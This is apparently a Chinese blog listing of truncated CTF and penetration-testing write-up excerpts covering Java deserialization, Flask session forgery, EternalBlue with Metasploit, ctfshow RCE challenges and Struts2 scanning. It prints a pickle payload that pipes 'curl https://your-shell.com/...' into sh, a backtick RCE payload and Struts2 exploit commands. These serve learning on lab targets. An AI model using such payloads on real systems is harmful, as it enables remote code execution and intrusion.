java反射
这里话是看这篇文章来进行学习的
上面的就是java反射的作用
这里的我们在本地自己写一个类来进行测试
Person.java
1234567891011121314151617181920212223242526272829303132import java.io.FileInputStream;import java.io.IOException;import java.io.ObjectInputStream;import java.io.Serializable;public class Person implements Serializable{ private String name; private int age; public Person() { //构造函数 } public Person(String name,int age) { this.name=name; this.age=age; } @Override ...
CCTF-web
考察的是python反序列化加session伪造
题目给的提示是查看cookie
这道题用到的工具 flask-unsign
这道题的话是禁用了R指令 所以的话我们就不能使用__reduce__了,那么我们就得想其他的办法例如b,c指令集等等
这里的话可以参考这篇文章 python 反序列化
这里是先随便注册一下,然后拿到cookie
注册后去查看cookie
然后利用工具对cookie进行解码(flask)
解码后在拿userinfo里的东西拿去解码
解码后得到这两个关键信息,然后去上面给的文章里的payload进行修改
就是修改这两个地方
payload
1b'\x80\x03cuserinfo\nUser\n)\x81}(V__setstate__\ncos\nsystem\nubVcurl https://your-shell.com/ip:port |sh\nb.'
然后对这个进行base64进行加密,并把加密后的结果替换掉userinfo里的东西,然后利用工具进行加密(这里的密钥是 CCTF)
然后去替换掉cookie,然后 ...
渗透入门1
渗透的第一步肯定是要进行信息收集了
那么我这这里就不多写了,这篇文章写的很全了 文章
这里补充一下c段的意思 文章
这里利用Metasploit framework来进行永恒之蓝的复现,来实现一下对这个渗透工具的认识
永恒之蓝复现实验环境
攻击机 kali linux ,ip:172.22.81.160
靶机 :windows7 ip: 192.168.59.129
这里下的是win7的企业版
1.这里首先第一步是得进行信息收集
先扫一下端口
在kaili上使用nmap探测win7的端口信息:nmap 192.168.59.129 ,可以看到该机器已开启445端口,当然也可以查看该445端口的banner信息,命令 nmap -sV -p445 192.168.59.129
这里开启的445端口就是这个漏洞出现的关键了。
这里的nmap中 sV的意思
也就是 —> 探测开放端口以确定服务/版本信息
想要查看其他的命令的话可以nmap -h
主机名和windows版本都能成功看到了
2.使用kali自带的metasploit(msf)
如果是初次使用,先输入m ...
ctfshow-常用姿势 刷题记录
这里包括多种类型的题目 为常见的姿势 用于积累自己的方法库
web801(flask算pin)题目
条件: flask debug模式开启 存在任意文件读取
这里的话是python版本的不同,那么计算pin码的脚本也是不相同的,原因就在于加密方式不相同。
python3.6是MD5加密,python3.8是sha1加密
详细的wp 这篇文章写的非常详细了,我这里就不写了。
web802( 无字母数字命令执行)题目
123456789101112131415161718<?php# -*- coding: utf-8 -*-# @Author: h1xa# @Date: 2022-03-19 12:10:55# @Last Modified by: h1xa# @Last Modified time: 2022-03-19 13:27:18# @email: h1xa@ctfer.com# @link: https://ctfer.comerror_reporting(0);highlight_file(__FILE__);$cmd = $_POST['cm ...
ctfshow-java 反序列化
URLDNSjava里的implements和c++里的那个继承是一个意思,就是会继承前者里的属性和函数。 这篇文章有详细讲 —-> 文章
这篇文章是讲java序列化与反序列化的 挺详细的 java序列化与反序列化
可以来看一下这个视频来学习java反序列和序列化 视频
上面的那篇文章是和下面的视频配套着讲的,也有对下面的代码的介绍
以下是视频中出现的三个java代码
Person.java
1234567891011121314151617181920212223242526272829303132import java.io.FileInputStream;import java.io.IOException;import java.io.ObjectInputStream;import java.io.Serializable;public class Person implements Serializable{ private String name; private int age; public Person() { ...
反弹shell
反弹shell大合集
里面还有工具
ctfshow-JAVA 刷题记录
脚本通杀
WEB279-294 296-297
以下题目参考 ——> 文章
全部题都是struts2框架漏洞
脚本通杀 下载 下载链接:https://pan.b类似/aidu.com/s/19yr0tWbG1UU_ULjEan5ttQ 提取码:bn71具体用法在md文件中,例如检测
1python Struts2Scan.py -u http://94c4c47e-4fb3-408c-97d7-56a5094f84a7.chall.ctf.show/S2-001/login.action
利用
1python Struts2Scan.py -u http://94c4c47e-4fb3-408c-97d7-56a5094f84a7.chall.ctf.show/S2-001/login.action -n S2-001 --exec
执行命令env即可得到flag
Struts2是用Java语言编写的一个基于MVC设计模式的Web应用框架
关于struts2漏洞,vulhub都有环境并且给出了漏洞原理和poc
GitHub项目地址:https://github.com/vu ...
ctfshow-RCE极限挑战
RCE挑战1题目
1234567891011121314<?phperror_reporting(0);highlight_file(__FILE__);$code = $_POST['code'];$code = str_replace("(","括号",$code);$code = str_replace(".","点",$code);eval($code);?>
这里只是把().给过滤掉了,直接使用不带点和括号的RCE方式就可以了,比如日志文件包含,临时文件包含
还有更简单的
payload
1code=echo `$_POST[1]`;&1=cat /f*
RCE挑战2题目
12345678910111213141516171819<?php//本题灵感来自研究Y4tacker佬在吃瓜杯投稿的shellme时想到的姿势,太棒啦~。error_reporting(0);highlight_file(__FILE__);if (isset($_POST[ ...
ctfshow-极限命令执行
关于getFlag()函数的命令执行 文章
官方wp 文章
极限命令执行1题目代码
12345678910111213141516<?php//本题灵感来自研究一直没做出来的某赛某题时想到的姿势,太棒啦~。//flag在根目录flag里,或者直接运行根目录getflagerror_reporting(0);highlight_file(__FILE__);if (isset($_POST['ctf_show'])) { $ctfshow = $_POST['ctf_show']; if (!preg_match("/[b-zA-Z_@#%^&*:{}\-\+<>\"|`;\[\]]/",$ctfshow)){ system($ctfshow); }else{ echo("????????"); }}?> ...
ctfshow-黑盒测试 刷题记录
什么是黑盒测试
这个黑盒测试就是我们不知道是啥考点,得自己去挖掘,然后找到这个是考哪个知识点的
web380(目录扫描)题目
就是这里的话会出现page_1.php page_2.php page_3.php
然后我们就得尝试去发现page.php 这就是一种思维发散,毕竟在网站上没看到的话,服务器上不一定没有。
难点就在这里
出现个$id,我们可以尝试给id传个值看看
发现是个文件包含的题目,并且限定了后缀,所以我们就得尝试去查看一下page.php源码
page.php
1234567891011121314151617181920212223<?php/*# -*- coding: utf-8 -*-# @Author: h1xa# @Date: 2021-01-08 19:50:40# @Last Modified by: h1xa# @Last Modified time: 2021-01-08 19:59:24# @email: h1xa@ctfer.com# @link: https://ctfer.com*/#error_report ...